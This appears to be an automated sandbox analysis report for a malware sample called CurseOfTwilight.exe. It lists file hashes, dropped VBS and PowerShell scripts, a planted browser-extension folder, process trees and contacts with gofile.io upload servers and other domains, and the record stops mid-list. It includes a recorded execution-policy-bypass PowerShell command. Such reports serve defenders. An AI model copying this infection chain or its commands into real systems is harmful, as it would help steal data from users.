| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| GB | 89.213.140.116:443 | nova-sentinel.com | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| GB | 89.213.140.115:443 | hawkish.fr | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
Files
\Users\Admin\AppData\Local\Temp\58baf7ba-050c-4af7-a102-440b9761fa9b.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
\Users\Admin\AppData\Local\Temp\5db94c80-4118-41f4-bfaa-59868be793d2.tmp.node
| MD5 | d9ca8449dee2f77b3c217c5de0bbc450 |
| SHA1 | d22696acbe8e428f6e70168aff12d202e7e2b9c5 |
| SHA256 | a1ab97d58849bd1baa44140340e5800590bbccc2f022e7bcea7d6837038fc0f2 |
| SHA512 | cc480c1fc8647ceafd70c2f58e397de7c17b1e8b699e9cc3ce6ff81970ab4301f7a54a64abdb5eab37288d24c1682410d18a20d795683f50491042ff5aca91aa |
memory/10064-44-0x000001BB208E0000-0x000001BB208F0000-memory.dmp
memory/10064-45-0x000001BB208E0000-0x000001BB208F0000-memory.dmp
memory/10064-43-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/10064-46-0x000001BB20860000-0x000001BB20882000-memory.dmp
memory/10064-49-0x000001BB20B70000-0x000001BB20BE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0hi515uc.pp5.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/10064-69-0x000001BB208E0000-0x000001BB208F0000-memory.dmp
memory/10064-70-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
memory/9616-78-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/9616-81-0x0000022A29CB0000-0x0000022A29CC0000-memory.dmp
memory/9616-82-0x0000022A29CB0000-0x0000022A29CC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8993d686f3d769cc5bfb6527cab46d24 |
| SHA1 | 1b8c78ebc6f3d8d034a38f8596b8d5176550bea8 |
| SHA256 | cad5244c55c634b5735c6d8d6a216b3e8e026d28f64d7cd6660326e001007d6c |
| SHA512 | 3bd8646642be0561b115fab9eb58448b9dffd95ec9477eaede4e29cf9f1ad86be7671daaae6dd2f801bdaec0c1388dcdf25ee806acc86f35bfb215e230b1582c |
memory/9616-100-0x0000022A29CB0000-0x0000022A29CC0000-memory.dmp
memory/9616-104-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6588-325-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6588-328-0x0000029B232A0000-0x0000029B232B0000-memory.dmp
memory/6588-327-0x0000029B232A0000-0x0000029B232B0000-memory.dmp
memory/8692-331-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs
| MD5 | d1111fbbaef28413de4a0a64e0d54f2d |
| SHA1 | 5bbadc5c5d504dcba5509d34986125e8446e3830 |
| SHA256 | beed3a3f6edc1e1b73a3cafa55f16ba61d56c87b7506ae9c33eb630bcbaa3a01 |
| SHA512 | 1196efb8579efc91105000afaac0b6c14f386aa29a64ddd88f9a2d6a980bd2eb8dd6a2e78457eb9e5614f9492d0e75342f01293c1a8341b153357f2d64c64af0 |
memory/8692-335-0x000001B297080000-0x000001B297090000-memory.dmp
memory/8692-337-0x000001B297080000-0x000001B297090000-memory.dmp
memory/6088-360-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6088-372-0x00000164A9CF0000-0x00000164A9D00000-memory.dmp
memory/6088-373-0x00000164A9CF0000-0x00000164A9D00000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e4074ed39e5c69f858bb421aca1340ec |
| SHA1 | 03ea9c25f5bafd76bc776024ff46704296406a6a |
| SHA256 | 398daf400c5f021e616a80156051067dc1301bef533e038790d8c0e81a6ed3c0 |
| SHA512 | a735d55d7629777f8c98c555e5683858445bc01717c49e581ccff110a23458ea40208e4e8cbdee7394de26037be186ec12c9daeedc830119a635974b7d7328bf |
C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1
| MD5 | adcea074e6d3724782556be754ab1d24 |
| SHA1 | f67393de938a2145817cd4baa62a93b5156fa7de |
| SHA256 | 91a6cf0c45094628e4612f9fd837e6e09bab2b9c19e4314f1b5bf98fa6c607ac |
| SHA512 | 54b53d931054dd6a360c8cf24b33a8f53ca455156a11da8c8e47c45d7d13ce660ee3acd7608b11209765df87b58c74eefe44b6326a3b920ff5e0192bfe75dde2 |
memory/6088-425-0x00000164A9CF0000-0x00000164A9D00000-memory.dmp
memory/8692-441-0x000001B297080000-0x000001B297090000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 38285a40af0640d0296e043206aad30d |
| SHA1 | 46a830801ee7f66f2b5c52cab3f2b96e9cd39a34 |
| SHA256 | 72ac6797720489033fbb9316b2f675c1b4780450c070e535ad462be596405aba |
| SHA512 | c6ad7c07bae31e94f7ca07791f2b657882ea6b867c8ec6ed5404feb7d4e2452284bb762bc46f4c175ebb87ce2946f5c4c0ef3a0272fe53a7e8c1597740b6e3d5 |
memory/6088-442-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/8692-449-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 07990a7fccea877d78855cfac2e77acb |
| SHA1 | db2ee2b0627fa0104e8cd4611fb6a0fa693a6e75 |
| SHA256 | 9324b64d5d0bf35e4a5746b5f422ebe2fd21e1775e13ce56cd96a5cedb7b8968 |
| SHA512 | 9c35af2514b364769a3d219849a96691fdd8ec6849ecee1f83e0c5eb7662f636362bdd048d210fc40739af10ad7815e782523eedf0ce7760bc8d73863a39b93e |
memory/7632-482-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6588-484-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/7632-486-0x00000262EB9E0000-0x00000262EB9F0000-memory.dmp
memory/7632-487-0x00000262EB9E0000-0x00000262EB9F0000-memory.dmp
memory/7632-507-0x00000262EB9E0000-0x00000262EB9F0000-memory.dmp
memory/7632-508-0x00000262EB9E0000-0x00000262EB9F0000-memory.dmp
memory/7632-512-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/2380-520-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/2380-521-0x0000027B1AB50000-0x0000027B1AB60000-memory.dmp
memory/2380-522-0x0000027B1AB50000-0x0000027B1AB60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70b26c3b6685b7e990384d394ec74652 |
| SHA1 | 94f3bb48be15b711b53b5da0bc8a557e79a0ea3b |
| SHA256 | ca7a07c3ed7e449fccad52bd728bf0566b1264e998131bcf9d78fad99eb9c20d |
| SHA512 | 6768131066b1a45e546f3528b66166470b6fd9138ec2a3cf1d9856078ee9c0aa5d3858794440ca3b6fa93f05ff8e3b0078fd7e22935085b2231a059d7c686386 |
memory/2380-542-0x0000027B1AB50000-0x0000027B1AB60000-memory.dmp
memory/2380-543-0x0000027B1AB50000-0x0000027B1AB60000-memory.dmp
memory/2380-546-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/9308-556-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/9308-557-0x000001E261DD0000-0x000001E261DE0000-memory.dmp
memory/9308-558-0x000001E261DD0000-0x000001E261DE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b81698463008adf1ef84be81148f67a2 |
| SHA1 | 63b8b9fef1c60e224999a7df8cbb86d9570789d4 |
| SHA256 | 317833f8b129ab3409489e6302b4c5284cbcc67afa87f858a1b5bc399345ebb1 |
| SHA512 | a6f7b066859f8e0dbe1fe4b8b7cdfae1cde2b7392ae7574b2b5a2194e50379d64abf6be75fcbf89d606f4b2e797ffd1a46ceeb7bd1d72810367c86db6819d50f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe
| MD5 | e3e481c4d8c2d4632c8ea7086ee004d1 |
| SHA1 | 24ea269d62c1141b6f7e85ec359e8a28fea32fcc |
| SHA256 | 36e71ee5cba0ca51af79c568fafebcddff71bb95138ca1f4942fc492d498e88a |
| SHA512 | 2f0adefe7fad5bf79c63e875b1dd8e1a7532e03c13c99e767cdce2cde7dff335246ac2c227aba5cfbabcc2c46d28f68cc09800f63a39bd4fa9819075f2278f56 |
memory/9308-575-0x000001E261DD0000-0x000001E261DE0000-memory.dmp
memory/9308-577-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/10656-586-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/10656-588-0x000001611F4D0000-0x000001611F4E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c3cb16747ff61276392b488109c5260c |
| SHA1 | 5b9ed30601b2f7651523f46178b3f4cb1c3f6800 |
| SHA256 | cca16e6157891aeb91befe39444e9e1d5b423085138ba48bfa7acdc7a5883f28 |
| SHA512 | ef5ce9d067144855f36e1d0c6ad604d5d2d29d9729d58d7fc872788b2bc54cd3729b049158daa6442fe388eeae540ab50e38004a57d3a7e8df35fc84f3375079 |
memory/10656-615-0x000001611F4D0000-0x000001611F4E0000-memory.dmp
memory/10656-617-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6136-619-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
memory/6136-621-0x00000172FEFF0000-0x00000172FF000000-memory.dmp
memory/6136-623-0x00000172FEFF0000-0x00000172FF000000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d9dab0cd34fbe500203c74e7c45dbbd0 |
| SHA1 | 60a003268e31b33334ac07bcf07db68bc7c13faf |
| SHA256 | 036de6eb68e08828b88bbbe571fdef13750c1086a4bf51c589da8fdfcaa3ed17 |
| SHA512 | e08c594dee4ba4c3397b7de9d24416f25d6ff0943b3fbd27905a0e9e0a2e32522ad7edff53ba9b9c7c697a4c84e1d858dde45efa8d1e32db132153b1ddf0884e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs
| MD5 | b755a84305c5e86277dbdb697768f70f |
| SHA1 | b1bfed42034d1f8cbcfa66daa3ccc78cd8ee8c68 |
| SHA256 | 58c52a5f5e0128cd62dbdcbf933e3f64c13f877e4ec5255f8991c3dac6a0f7b3 |
| SHA512 | 3428b9e4c7cb2015de8d7357c15bc18b6e6dd6c1230968f8fa9720f4bf7e54f6b3f00f85e1a30fecbd7d7022b6fed67f79dee4e288f379f2e78d1b987d0b7503 |
memory/6136-638-0x00000172FEFF0000-0x00000172FF000000-memory.dmp
memory/6136-642-0x00007FFE84D30000-0x00007FFE8571C000-memory.dmp
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
| MD5 | 252b4fda07550496d330d819f15ceb3e |
| SHA1 | 650584312b310219a26d5fc20cb1804bb6c4dde5 |
| SHA256 | 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d |
| SHA512 | a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
| MD5 | c555604e8b6f818991e186342f856b1b |
| SHA1 | 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0 |
| SHA256 | 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972 |
| SHA512 | 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
| MD5 | f0f11cd478cc44d518c16820ede9d253 |
| SHA1 | cfaf8d2e071f2ade0894578e5b44e02032d27be4 |
| SHA256 | 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb |
| SHA512 | ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png
| MD5 | 2f0a6a34d9b95bba0e3358ddd41ff2ac |
| SHA1 | f39a9e7aeab9fe86fd9034284516de40186e6e93 |
| SHA256 | 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5 |
| SHA512 | a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084 |
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip
| MD5 | 590f88f1402d594e3c1112bf2e4a8b85 |
| SHA1 | 409c831b45408bd4316335e61fc2890779c40c32 |
| SHA256 | 615f39840c799a02d0be922a434a6559d4be0c4ebc110dcdb5028e4a784d66f4 |
| SHA512 | 205789a5fd3d1d7edf6a94ca831e25c5a3bc71b147b9bfc7bc971389d83652ec2b9e6e004bd460207fba6cb4bfba66b032b3f12979f33ed2b6965d5df17afb45 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
123s
Max time network
141s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\locales\de.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3412-4-0x00007FFD8AC60000-0x00007FFD8B64C000-memory.dmp
memory/3412-6-0x000001FBF5940000-0x000001FBF5950000-memory.dmp
memory/3412-5-0x000001FBF5E60000-0x000001FBF5E82000-memory.dmp
memory/3412-7-0x000001FBF5940000-0x000001FBF5950000-memory.dmp
memory/3412-10-0x000001FBF6010000-0x000001FBF6086000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhwwhume.t0n.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3412-33-0x000001FBF5940000-0x000001FBF5950000-memory.dmp
memory/3412-34-0x00007FFD8AC60000-0x00007FFD8B64C000-memory.dmp
memory/3412-35-0x000001FBF5940000-0x000001FBF5950000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1360 wrote to memory of 4020 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 80.192.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
20s
Max time network
164s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.0.1577908248\793586513" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb571834-4296-413b-af3d-1fcec78d8caf} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 1832 1fd2cd04758 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.1.981144421\1706223644" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4b92c2e-9dca-45c7-9cdd-51fb9a39d037} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 2168 1fd19770458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.2.1726920197\1630438161" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b09cb880-ddf0-4687-8e04-21fc24439098} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 2948 1fd2fdab858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.3.505248057\7527498" -childID 2 -isForBrowser -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8b7f479-edcf-4c40-abb7-0c63f94587f4} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 3056 1fd19769358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.4.243396272\1789515667" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {402ba497-1b63-4780-8e68-57101ef2457f} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4376 1fd319db158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.5.1408002128\257508417" -childID 4 -isForBrowser -prefsHandle 4784 -prefMapHandle 4776 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2b3d7de-017d-49bd-a719-e5f01ce2cbaf} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4808 1fd1976ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.6.524114940\406056401" -childID 5 -isForBrowser -prefsHandle 4940 -prefMapHandle 4944 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {59c3c8c3-e948-4501-b61a-a30b1105cd7c} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4932 1fd32199058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1512.7.1224361594\817426020" -childID 6 -isForBrowser -prefsHandle 5128 -prefMapHandle 5132 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd1adc2e-5ca8-4247-925b-323f044793e3} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" 4744 1fd32198d58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1880 --field-trial-handle=1900,i,2978336832879354427,6294707759333432041,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\2d8vnShZQvWIiF29eexo9zyV06W\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2056 --field-trial-handle=1900,i,2978336832879354427,6294707759333432041,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
